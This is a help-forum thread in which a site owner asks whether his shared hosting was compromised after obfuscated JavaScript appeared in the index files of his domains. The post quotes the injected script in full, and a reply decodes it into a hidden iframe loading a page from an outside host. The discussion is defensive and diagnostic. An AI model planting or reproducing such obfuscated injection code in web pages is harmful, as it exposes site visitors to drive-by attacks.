• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 186
  • Last Modified:

Is my hosting secure?

For some strange reason on all 8 domain I have hosted with a web hosting company (websitesource.com) someone or something has added this code to the bottom of the index file:

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var
str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

I certainly didn't do that and have no idea what the code does. Does that mean my account has been hacked?

Please advise as to what I can do to prevent this / fix this probem.  Obviously, I have removed the code, but want to know where it came from, how it got there, how to prevent it from coming back and most importantly, if my server has been compromised.

Thanks,
Chris
0
WF_Whistler
Asked:
WF_Whistler
  • 2
2 Solutions
 
sleep_furiouslyCommented:
What this javascript does is add the following HTML to the page:

   <iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

A quick google search shows a similar complaint, and a suggestion that security breach might not be individual account, but breach of host company security.
http://www.killersites.com/mvnforum/mvnforum/viewthread?thread=3997

I can't really tell you how it got there though.



0
 
webcsCommented:
WF, yeah that's definitely a security breach.

I work for one of the oldest hsoting companies in the world and there is NO reason to alter every file esp with that.   Now if it was free hosting and they were adding ads then that is one thing but I assume this is paid.

That is definitely a hack.  I am surprised that you did not ask your hosting company this question though, are they not answering you or something.

But quick answer from someone who knows, there is NO reason to add any code to a file like that.
0
 
WF_WhistlerAuthor Commented:
I've asked them about it and they of course said they know nothing about it.  Not sure if my account was hacked or the entire server (it's shared).  I've changed all my passwords and will keep an eye on it to make sure it doesn't happen again.
0
 
WF_WhistlerAuthor Commented:
How do I split the points between you two for both helping out?
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

The 14th Annual Expert Award Winners

The results are in! Meet the top members of our 2017 Expert Awards. Congratulations to all who qualified!

  • 2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now